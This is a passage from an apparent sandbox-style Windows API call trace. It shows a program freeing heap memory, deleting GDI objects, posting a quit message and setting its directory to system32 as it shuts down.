hHeap=0xcc0000) returned 1 [0275.127] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33cb8 | out: hHeap=0xcc0000) returned 1 [0275.127] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed7078 | out: hHeap=0xcc0000) returned 1 [0275.127] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b28 | out: hHeap=0xcc0000) returned 1 [0275.127] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed70f0 | out: hHeap=0xcc0000) returned 1 [0275.127] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33be8 | out: hHeap=0xcc0000) returned 1 [0275.127] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf82018 | out: hHeap=0xcc0000) returned 1 [0275.127] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ae8 | out: hHeap=0xcc0000) returned 1 [0275.127] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33028 | out: hHeap=0xcc0000) returned 1 [0275.127] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33068 | out: hHeap=0xcc0000) returned 1 [0275.127] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bf8 | out: hHeap=0xcc0000) returned 1 [0275.127] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf32fa8 | out: hHeap=0xcc0000) returned 1 [0275.127] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf32f48 | out: hHeap=0xcc0000) returned 1 [0275.127] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed6ef8 | out: hHeap=0xcc0000) returned 1 [0275.127] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf32f08 | out: hHeap=0xcc0000) returned 1 [0275.127] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed6ee0 | out: hHeap=0xcc0000) returned 1 [0275.127] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf32ef8 | out: hHeap=0xcc0000) returned 1 [0275.127] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed6ec8 | out: hHeap=0xcc0000) returned 1 [0275.127] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf32ee8 | out: hHeap=0xcc0000) returned 1 [0275.127] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed6eb0 | out: hHeap=0xcc0000) returned 1 [0275.127] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf32ed8 | out: hHeap=0xcc0000) returned 1 [0275.127] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed6e98 | out: hHeap=0xcc0000) returned 1 [0275.127] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf32ec8 | out: hHeap=0xcc0000) returned 1 [0275.127] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed6e80 | out: hHeap=0xcc0000) returned 1 [0275.127] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf32eb8 | out: hHeap=0xcc0000) returned 1 [0275.127] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed6e68 | out: hHeap=0xcc0000) returned 1 [0275.127] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf32ea8 | out: hHeap=0xcc0000) returned 1 [0275.127] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed6e50 | out: hHeap=0xcc0000) returned 1 [0275.127] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf32e98 | out: hHeap=0xcc0000) returned 1 [0275.127] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed6e38 | out: hHeap=0xcc0000) returned 1 [0275.128] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf32e88 | out: hHeap=0xcc0000) returned 1 [0275.128] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed6e20 | out: hHeap=0xcc0000) returned 1 [0275.128] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf32e78 | out: hHeap=0xcc0000) returned 1 [0275.128] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed6e08 | out: hHeap=0xcc0000) returned 1 [0275.128] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf32e68 | out: hHeap=0xcc0000) returned 1 [0275.128] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed6df0 | out: hHeap=0xcc0000) returned 1 [0275.128] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf32e58 | out: hHeap=0xcc0000) returned 1 [0275.128] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed6dd8 | out: hHeap=0xcc0000) returned 1 [0275.128] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf32e48 | out: hHeap=0xcc0000) returned 1 [0275.128] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed6dc0 | out: hHeap=0xcc0000) returned 1 [0275.128] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf32e38 | out: hHeap=0xcc0000) returned 1 [0275.128] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed6da8 | out: hHeap=0xcc0000) returned 1 [0275.128] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf32e28 | out: hHeap=0xcc0000) returned 1 [0275.128] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed6d90 | out: hHeap=0xcc0000) returned 1 [0275.128] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf32df8 | out: hHeap=0xcc0000) returned 1 [0275.128] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd1d1d8 | out: hHeap=0xcc0000) returned 1 [0275.128] KillTimer (hWnd=0x0, uIDEvent=0x7fb9) returned 1 [0275.128] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf32f18 | out: hHeap=0xcc0000) returned 1 [0275.128] NtdllDialogWndProc_W () returned 0x0 [0275.139] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0275.139] NtdllDialogWndProc_W () returned 0x0 [0275.140] DeleteObject (ho=0x90100788) returned 1 [0275.140] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb920 | out: hHeap=0xcc0000) returned 1 [0275.140] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb950 | out: hHeap=0xcc0000) returned 1 [0275.140] DeleteObject (ho=0x271006da) returned 1 [0275.140] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb908 | out: hHeap=0xcc0000) returned 1 [0275.140] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb8d8 | out: hHeap=0xcc0000) returned 1 [0275.140] DeleteObject (ho=0x8f1007ad) returned 1 [0275.140] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed6fb8 | out: hHeap=0xcc0000) returned 1 [0275.140] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed6d18 | out: hHeap=0xcc0000) returned 1 [0275.140] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33aa8 | out: hHeap=0xcc0000) returned 1 [0275.140] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb740 | out: hHeap=0xcc0000) returned 1 [0275.140] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0275.140] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xeebb00 | out: hHeap=0xcc0000) returned 1 [0275.140] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33a58 | out: hHeap=0xcc0000) returned 1 [0275.140] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94f0 | out: hHeap=0xcc0000) returned 1 [0275.140] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33a88 | out: hHeap=0xcc0000) returned 1 [0275.140] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xeebb30 | out: hHeap=0xcc0000) returned 1 [0275.141] PostQuitMessage (nExitCode=0) [0275.141] GetMessageW (in: lpMsg=0x8dfbbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x8dfbbc) returned 0 [0275.141] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8b00 | out: hHeap=0xcc0000) returned 1 [0275.141] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8f08 | out: hHeap=0xcc0000) returned 1 [0275.141] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdc9630 | out: hHeap=0xcc0000) returned 1 [0275.141] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9268 | out: hHeap=0xcc0000) returned 1 [0275.141] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdc95e0 | out: hHeap=0xcc0000) returned 1 [0275.141] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd58b0 | out: hHeap=0xcc0000) returned 1 [0275.141] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9298 | out: hHeap=0xcc0000) returned 1 [0275.141] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9280 | out: hHeap=0xcc0000) returned 1 [0275.141] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd92b0 | out: hHeap=0xcc0000) returned 1 [0275.141] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd92c8 | out: hHeap=0xcc0000) returned 1 [0275.142] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd92e0 | out: hHeap=0xcc0000) returned 1 [0275.142] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdc9608 | out: hHeap=0xcc0000) returned 1 [0275.142] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8dd0 | out: hHeap=0xcc0000) returned 1 [0275.142] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8ab8 | out: hHeap=0xcc0000) returned 1 [0275.142] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdc95b8 | out: hHeap=0xcc0000) returned 1 [0275.143] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8650 | out: hHeap=0xcc0000) returned 1 [0275.143] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8aa0 | out: hHeap=0xcc0000) returned 1 [0275.143] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdc9568 | out: hHeap=0xcc0000) returned 1 [0275.143] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd58a0 | out: hHeap=0xcc0000) returned 1 [0275.143] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd91f0 | out: hHeap=0xcc0000) returned 1 [0275.143] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd91d8 | out: hHeap=0xcc0000) returned 1 [0275.143] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9208 | out: hHeap=0xcc0000) returned 1 [0275.143] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9220 | out: hHeap=0xcc0000) returned 1 [0275.143] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdc9590 | out: hHeap=0xcc0000) returned 1 [0275.143] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdc94f0 | out: hHeap=0xcc0000) returned 1 [0275.143] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5870 | out: hHeap=0xcc0000) returned 1 [0275.143] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9130 | out: hHeap=0xcc0000) returned 1 [0275.143] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9118 | out: hHeap=0xcc0000) returned 1 [0275.143] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9148 | out: hHeap=0xcc0000) returned 1 [0275.143] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8ad0 | out: hHeap=0xcc0000) returned 1 [0275.143] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5880 | out: hHeap=0xcc0000) returned 1 [0275.143] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9178 | out: hHeap=0xcc0000) returned 1 [0275.143] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9160 | out: hHeap=0xcc0000) returned 1 [0275.143] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdc9540 | out: hHeap=0xcc0000) returned 1 [0275.143] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5890 | out: hHeap=0xcc0000) returned 1 [0275.143] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd91a8 | out: hHeap=0xcc0000) returned 1 [0275.143] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9190 | out: hHeap=0xcc0000) returned 1 [0275.143] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd91c0 | out: hHeap=0xcc0000) returned 1 [0275.143] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdc9518 | out: hHeap=0xcc0000) returned 1 [0275.143] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd86c8 | out: hHeap=0xcc0000) returned 1 [0275.143] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5840 | out: hHeap=0xcc0000) returned 1 [0275.144] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9058 | out: hHeap=0xcc0000) returned 1 [0275.144] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9040 | out: hHeap=0xcc0000) returned 1 [0275.144] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8a88 | out: hHeap=0xcc0000) returned 1 [0275.144] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5850 | out: hHeap=0xcc0000) returned 1 [0275.144] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9088 | out: hHeap=0xcc0000) returned 1 [0275.144] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9070 | out: hHeap=0xcc0000) returned 1 [0275.144] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd90a0 | out: hHeap=0xcc0000) returned 1 [0275.144] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8b30 | out: hHeap=0xcc0000) returned 1 [0275.144] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5860 | out: hHeap=0xcc0000) returned 1 [0275.144] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd90d0 | out: hHeap=0xcc0000) returned 1 [0275.144] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd90b8 | out: hHeap=0xcc0000) returned 1 [0275.144] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd90e8 | out: hHeap=0xcc0000) returned 1 [0275.144] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9100 | out: hHeap=0xcc0000) returned 1 [0275.144] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdc94c8 | out: hHeap=0xcc0000) returned 1 [0275.144] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8b48 | out: hHeap=0xcc0000) returned 1 [0275.144] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5800 | out: hHeap=0xcc0000) returned 1 [0275.144] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8f38 | out: hHeap=0xcc0000) returned 1 [0275.144] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8f20 | out: hHeap=0xcc0000) returned 1 [0275.144] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdde5c0 | out: hHeap=0xcc0000) returned 1 [0275.144] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5810 | out: hHeap=0xcc0000) returned 1 [0275.144] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8f68 | out: hHeap=0xcc0000) returned 1 [0275.144] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8f50 | out: hHeap=0xcc0000) returned 1 [0275.144] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8f80 | out: hHeap=0xcc0000) returned 1 [0275.145] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdc94a0 | out: hHeap=0xcc0000) returned 1 [0275.145] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5820 | out: hHeap=0xcc0000) returned 1 [0275.145] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8fb0 | out: hHeap=0xcc0000) returned 1 [0275.145] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8f98 | out: hHeap=0xcc0000) returned 1 [0275.145] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8fc8 | out: hHeap=0xcc0000) returned 1 [0275.145] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd43678 | out: hHeap=0xcc0000) returned 1 [0275.145] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5830 | out: hHeap=0xcc0000) returned 1 [0275.145] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8ff8 | out: hHeap=0xcc0000) returned 1 [0275.145] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8fe0 | out: hHeap=0xcc0000) returned 1 [0275.145] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9010 | out: hHeap=0xcc0000) returned 1 [0275.145] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9028 | out: hHeap=0xcc0000) returned 1 [0275.145] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdc9478 | out: hHeap=0xcc0000) returned 1 [0275.145] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8668 | out: hHeap=0xcc0000) returned 1 [0275.145] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd57c0 | out: hHeap=0xcc0000) returned 1 [0275.145] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8e00 | out: hHeap=0xcc0000) returned 1 [0275.145] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8de8 | out: hHeap=0xcc0000) returned 1 [0275.145] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdde588 | out: hHeap=0xcc0000) returned 1 [0275.145] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd57d0 | out: hHeap=0xcc0000) returned 1 [0275.145] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8e30 | out: hHeap=0xcc0000) returned 1 [0275.145] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8e18 | out: hHeap=0xcc0000) returned 1 [0275.145] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8e48 | out: hHeap=0xcc0000) returned 1 [0275.145] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdc9428 | out: hHeap=0xcc0000) returned 1 [0275.145] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd57e0 | out: hHeap=0xcc0000) returned 1 [0275.145] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8e78 | out: hHeap=0xcc0000) returned 1 [0275.145] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8e60 | out: hHeap=0xcc0000) returned 1 [0275.145] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8e90 | out: hHeap=0xcc0000) returned 1 [0275.146] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdde5f8 | out: hHeap=0xcc0000) returned 1 [0275.146] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd57f0 | out: hHeap=0xcc0000) returned 1 [0275.146] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8ec0 | out: hHeap=0xcc0000) returned 1 [0275.146] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8ea8 | out: hHeap=0xcc0000) returned 1 [0275.146] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8ed8 | out: hHeap=0xcc0000) returned 1 [0275.146] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8ef0 | out: hHeap=0xcc0000) returned 1 [0275.146] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdc9450 | out: hHeap=0xcc0000) returned 1 [0275.146] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8b18 | out: hHeap=0xcc0000) returned 1 [0275.146] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5780 | out: hHeap=0xcc0000) returned 1 [0275.146] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd86e0 | out: hHeap=0xcc0000) returned 1 [0275.146] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8740 | out: hHeap=0xcc0000) returned 1 [0275.146] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdde550 | out: hHeap=0xcc0000) returned 1 [0275.146] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5790 | out: hHeap=0xcc0000) returned 1 [0275.146] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8cf8 | out: hHeap=0xcc0000) returned 1 [0275.146] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8ce0 | out: hHeap=0xcc0000) returned 1 [0275.146] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8d10 | out: hHeap=0xcc0000) returned 1 [0275.146] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdc93d8 | out: hHeap=0xcc0000) returned 1 [0275.146] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd57a0 | out: hHeap=0xcc0000) returned 1 [0275.146] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8d40 | out: hHeap=0xcc0000) returned 1 [0275.146] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8d28 | out: hHeap=0xcc0000) returned 1 [0275.146] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8d58 | out: hHeap=0xcc0000) returned 1 [0275.146] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8698 | out: hHeap=0xcc0000) returned 1 [0275.146] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd57b0 | out: hHeap=0xcc0000) returned 1 [0275.146] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8d88 | out: hHeap=0xcc0000) returned 1 [0275.146] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8d70 | out: hHeap=0xcc0000) returned 1 [0275.147] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8da0 | out: hHeap=0xcc0000) returned 1 [0275.147] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8db8 | out: hHeap=0xcc0000) returned 1 [0275.147] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdc9400 | out: hHeap=0xcc0000) returned 1 [0275.147] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8710 | out: hHeap=0xcc0000) returned 1 [0275.147] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5740 | out: hHeap=0xcc0000) returned 1 [0275.147] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8b78 | out: hHeap=0xcc0000) returned 1 [0275.147] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8b60 | out: hHeap=0xcc0000) returned 1 [0275.147] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8728 | out: hHeap=0xcc0000) returned 1 [0275.147] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5750 | out: hHeap=0xcc0000) returned 1 [0275.147] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8ba8 | out: hHeap=0xcc0000) returned 1 [0275.147] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8b90 | out: hHeap=0xcc0000) returned 1 [0275.147] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8bc0 | out: hHeap=0xcc0000) returned 1 [0275.147] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8a70 | out: hHeap=0xcc0000) returned 1 [0275.147] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5760 | out: hHeap=0xcc0000) returned 1 [0275.147] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8bf0 | out: hHeap=0xcc0000) returned 1 [0275.147] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8bd8 | out: hHeap=0xcc0000) returned 1 [0275.147] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8c08 | out: hHeap=0xcc0000) returned 1 [0275.147] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdc93b0 | out: hHeap=0xcc0000) returned 1 [0275.147] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5770 | out: hHeap=0xcc0000) returned 1 [0275.147] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8c38 | out: hHeap=0xcc0000) returned 1 [0275.147] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8c20 | out: hHeap=0xcc0000) returned 1 [0275.147] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8c50 | out: hHeap=0xcc0000) returned 1 [0275.147] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8c68 | out: hHeap=0xcc0000) returned 1 [0275.147] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8c80 | out: hHeap=0xcc0000) returned 1 [0275.147] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8c98 | out: hHeap=0xcc0000) returned 1 [0275.147] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8cb0 | out: hHeap=0xcc0000) returned 1 [0275.147] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8cc8 | out: hHeap=0xcc0000) returned 1 [0275.147] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdde518 | out: hHeap=0xcc0000) returned 1 [0275.148] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8638 | out: hHeap=0xcc0000) returned 1 [0275.148] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5720 | out: hHeap=0xcc0000) returned 1 [0275.148] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8770 | out: hHeap=0xcc0000) returned 1 [0275.148] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8758 | out: hHeap=0xcc0000) returned 1 [0275.149] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd89c8 | out: hHeap=0xcc0000) returned 1 [0275.149] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd89e0 | out: hHeap=0xcc0000) returned 1 [0275.149] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd89f8 | out: hHeap=0xcc0000) returned 1 [0275.149] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd63848 | out: hHeap=0xcc0000) returned 1 [0275.149] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd5730 | out: hHeap=0xcc0000) returned 1 [0275.149] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd8a28 | out: hHeap=0xcc0000) returned 1 [0275.155] SetCurrentDirectoryW (lpPathName="C:\\Windows\\system32" (normalized: 